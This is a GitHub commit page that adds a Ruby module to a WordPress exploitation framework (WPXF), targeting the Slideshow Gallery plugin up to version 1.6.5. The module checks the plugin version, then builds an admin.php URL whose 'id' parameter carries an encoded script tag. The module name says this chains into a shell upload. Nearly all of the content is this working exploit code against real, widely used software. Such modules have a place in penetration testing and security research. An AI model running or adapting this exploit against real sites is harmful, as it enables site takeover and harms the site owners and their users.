Skip to content
This repository was archived by the owner on Oct 22, 2020. It is now read-only.

Commit a3c490b

Browse files
committed
Add Slideshow Gallery <= 1.6.5 reflected XSS shell upload
1 parent a8c3a5c commit a3c490b

File tree

1 file changed

+33
-0
lines changed

1 file changed

+33
-0
lines changed
Lines changed: 33 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,33 @@
1+
class Wpxf::Exploit::SlideshowGalleryReflectedXssShellUpload < Wpxf::Module
2+
include Wpxf::WordPress::ReflectedXss
3+
4+
def initialize
5+
super
6+
7+
update_info(
8+
name: 'Slideshow Gallery <= 1.6.5 Reflected XSS Shell Upload',
9+
author: [
10+
'DefenseCode <www.defensecode.com>', # Discovery
11+
'Rob Carr <rob[at]rastating.com>' # WPXF module
12+
],
13+
references: [
14+
['WPVDB', '8795'],
15+
['URL', 'http://www.defensecode.com/advisories/DC-2017-01-014_WordPress_Tribulant_Slideshow_Gallery_Plugin_Advisory.pdf']
16+
],
17+
date: 'Apr 10 2017'
18+
)
19+
end
20+
21+
def check
22+
check_plugin_version_from_readme('slideshow-gallery', '1.6.6')
23+
end
24+
25+
def vulnerable_url
26+
normalize_uri(wordpress_url_admin, 'admin.php')
27+
end
28+
29+
def url_with_xss
30+
"#{vulnerable_url}?page=slideshow-galleries&method=view&id=#{Utility::Text.rand_numeric(2)}"\
31+
"%5C%5C%5C%5C%22%3E%3Cscript%3E#{xss_url_and_ascii_encoded_include_script}%3C%2Fscript%3E%3Ca+href%3D%22"
32+
end
33+
end

0 commit comments

Comments
 (0)